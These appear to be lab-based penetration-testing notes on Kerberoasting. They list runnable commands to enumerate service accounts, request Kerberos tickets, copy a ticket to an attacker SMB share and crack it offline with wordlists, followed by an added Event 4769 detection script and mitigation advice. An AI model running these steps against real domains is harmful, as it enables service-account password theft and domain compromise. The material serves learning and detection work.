kerberoasting
- (Step 1) - identify SPNs for services
- (Step 2) - generate a Service Ticket for the SPN
- (Step 3) - extract the Service Ticket from memory
- (Step 4) - transfer the .kirbi file to Kali
- (Step 5) - crack the Service Ticket to get the plaintext password
Background
Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.
When you want to authenticate to some service using Kerberos, you contact the DC and tell it which service you want to authenticate to. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with its password, check who you are, and decide if it wants to let you in.
In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service.
Most of the time you will need an active account on the domain in order to initiate Kerberoasting, but if an account on the DC has the UserAccountControl setting “Do not require Kerberos preauthentication” enabled, it is possible to request and receive a ticket to crack without a valid account on the domain.
version 1
Get Hash
Use the GetUserSPNs.py script from Impacket to get a list of service usernames which are associated with normal user accounts. It will also get a ticket that I can crack.
```
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

Password:
ServicePrincipalName  Name           MemberOf                                                   PasswordLastSet      LastLogon
--------------------  -------------  ---------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2018-07-21 11:05:53

root@kali:~/hackthebox/active-10.10.10.100# cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f3760xxxxx......
```
version 2
list SPN
```powershell
# Build an LDAP path to the PDC of the current domain, e.g. LDAP://DC01.corp.com/DC=corp,DC=com
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$searcher.SearchRoot = $objDomain
# Return every object that has at least one servicePrincipalName set
$searcher.Filter = "serviceprincipalname=*"
$items = $searcher.FindAll()
Write-Host "-------------------------"
Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        Write-Host "Display Name:" $prop.displayname
        Write-Host "Serviceprincipal Name:" $prop.serviceprincipalname
    }
    Write-Host "-------------------------"
}
```
```powershell
# (Step 2) request a Service Ticket for the SPN; the ticket is cached in memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSQL/CorpSqlServer.corp.com'
# list the cached tickets
klist
```
```
# (Step 4) transfer the .kirbi file to kali
# on kali
/opt/tools/impacket/examples/smbserver.py public .
# on windows
copy '0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi' \\192.168.111.222\public\

# (Step 5) crack the Service Ticket with tgsrepcrack ...
sudo apt install -y kerberoast
python3 /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
# ... or convert the ticket to a john hash and crack it there
/opt/tools/kerberoast/kirbi2john.py 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
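On the defender's side, the ticket requests above land in the Domain Controller Security log as Event ID 4769, with TicketEncryptionType 0x17 (RC4-HMAC, the etype behind the `$krb5tgs$23$` hash format) for service accounts that are ordinary users rather than computers. The following added example (not part of the original notes) flags that pattern over a constructed set of 4769 records; the field names follow the Windows event schema, the account and service names and the threshold are constructed.

```python
"""Flag Kerberoasting indicators in Windows Security Event 4769 records.

Added example, not part of the original notes. Assumes 4769 fields are
already parsed into dicts; the sample records below are constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"          # ticket encryption type behind $krb5tgs$23$ hashes
MIN_DISTINCT_SPNS = 3      # constructed threshold: services hit by one account


def is_suspicious_request(ev):
    """One TGS request worth a look: an RC4 ticket for a user-account service.

    Computer accounts end with '$' and may legitimately use RC4 on old hosts,
    and krbtgt is the TGT itself, so both are excluded.
    """
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_suspects(events, min_spns=MIN_DISTINCT_SPNS):
    """Map requesting account -> sorted service accounts, for accounts that
    pulled RC4 tickets for at least `min_spns` distinct user-account services."""
    spns_by_user = defaultdict(set)
    for ev in events:
        if is_suspicious_request(ev):
            spns_by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(spns) for user, spns in spns_by_user.items()
            if len(spns) >= min_spns}


# Constructed sample 4769 records (ServiceName is the account holding the SPN).
SAMPLE_4769 = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "websvc", "TicketEncryptionType": "0x17"},
    # Normal activity: an AES ticket, and an RC4 ticket for a computer account.
    {"TargetUserName": "jsmith@ACTIVE.HTB", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "jsmith@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x17"},
]

if __name__ == "__main__":
    for user, spns in kerberoast_suspects(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(spns)}")
```

Setting AES-only encryption on SPN accounts and rotating their passwords is the mitigation that removes the RC4 signal along with the cracking speed; the remaining signal is then a burst of distinct-service requests from one account.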
Ref
- https://github.com/nidem/kerberoast
- https://0xdf.gitlab.io/2018/12/08/htb-active.html